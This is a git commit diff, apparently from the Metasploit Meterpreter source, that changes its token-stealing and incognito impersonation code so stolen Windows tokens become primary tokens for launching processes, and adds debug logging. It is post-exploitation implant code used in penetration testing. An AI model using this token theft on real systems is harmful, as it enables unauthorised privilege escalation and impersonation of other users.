This *should* fix all cases where execute -t would fail to use an impersonated token

git-svn-id: file:///home/svn/framework3/trunk@9754 4d416f70-5f16-0410-b530-b9f4589650da
2025-03-24 18:16:24 +01:00 · 2010-07-09 19:32:51 +00:00 · 2010-07-09 19:32:51 +00:00 · 4ccc02d329
commit 4ccc02d329
parent 7c45fd988e
4 changed files with 15 additions and 7 deletions
--- a/c/meterpreter/source/extensions/incognito/incognito.c
+++ b/c/meterpreter/source/extensions/incognito/incognito.c
@ -150,7 +150,7 @@ DWORD request_incognito_impersonate_token(Remote *remote, Packet *packet)
 					strncat(return_value, token_list[i].username, sizeof(return_value)-strlen(return_value)-1);
 					strncat(return_value, "\n", sizeof(return_value)-strlen(return_value)-1);
 				
-					if (!DuplicateToken(token_list[i].token, SecurityImpersonation, &xtoken)) {
+					if (!DuplicateTokenEx(token_list[i].token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &xtoken)) {
 						dprintf("[INCOGNITO] Failed to duplicate token for %s (%u)", token_list[i].username, GetLastError());
 					} else {
 						core_update_thread_token(remote, xtoken);
--- a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@ -231,9 +231,10 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
 			break;	
 		}

-		if(! DuplicateToken(token, SecurityImpersonation, &xtoken)) {
+
+		if(! DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &xtoken)) {
 			res = GetLastError();
-			dprintf("[STEAL-TOKEN] Failed to duplicate token for %d (%u)", pid, res);
+			dprintf("[STEAL-TOKEN] Failed to duplicate a primary token for %d (%u)", pid, res);
 			break;	
 		}

--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
@ -256,16 +256,21 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 		{
 			// If there is an impersonated token stored, use that one first, otherwise
 			// try to grab the current thread token, then the process token
-			if (remote->hThreadToken)
+			if (remote->hThreadToken){
 				token = remote->hThreadToken;
+				dprintf("[execute] using thread impersonation token");
+			}
 			else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
 				OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token);

+			dprintf("[execute] token is 0x%.8x", token);
+
 			// Duplicate to make primary token (try delegation first)
 			if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken))
 			if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
 			{
 				result = GetLastError();
+				dprintf("[execute] failed to duplicate token 0x%.8x", result);
 				break;
 			}

@ -275,6 +280,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 				lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "DestroyEnvironmentBlock" );
 				if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock( &pEnvironment, pToken, FALSE)) {
 					createFlags |= CREATE_UNICODE_ENVIRONMENT;
+					dprintf("[execute] created a duplicated environment block");
 				} else {
 					pEnvironment = NULL;
 				}
@ -284,6 +290,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 			if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
 			{
 				result = GetLastError();
+				dprintf("[execute] failed to create the new process 0x%.8x", result);
 				break;
 			}